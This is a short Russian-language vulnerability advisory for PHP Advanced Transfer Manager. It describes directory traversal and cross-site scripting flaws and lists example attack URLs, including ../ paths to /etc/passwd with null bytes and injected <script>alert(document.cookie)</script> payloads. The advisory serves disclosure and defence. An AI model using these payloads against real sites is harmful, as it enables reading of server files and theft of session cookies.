Программа: PHP Advanced Transfer Manager
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и просмотреть произвольные файлы на системе.
1. Уязвимость существует из-за того, что программное обеспечение не обрабатывает должным образом входные данные в параметрах 'currentdir' и 'current_dir'. Удаленный пользователь может с помощью специально сформированного URL, содержащего символы обхода каталога, просмотреть произвольные файлы на системе с привилегиями Web сервера.
Пример:
http://[target]/[path]/viewers/txt.php?currentdir= ../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/txt.php?c urrentdir= ../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/htm.php?current_dir= ../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/ htm.php?current_dir= ../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/html.php?current_dir= ../../../../../../../etc/passwd%00
http://[target]/[pat h]/viewers/html.php?current_dir= ../../../../../../../etc&filename=passwd
http://[target]/phpatm/viewers/zip.php?current_dir= ../../../../../../../[filename].zip%00
http://[target]/phpatm/viewers/zip.php?current_dir= ../../../.. /../../..&filename=[filename].zip
2. Межсайтовый скриптинг возможен из-за отсутствия проверки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[target]/[path]/viewers/txt.php?font=% 22%
3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path]/viewers/txt.php?normalfontcolor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http:/ /[target]/[path]/viewers/txt.php?mess[31]=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E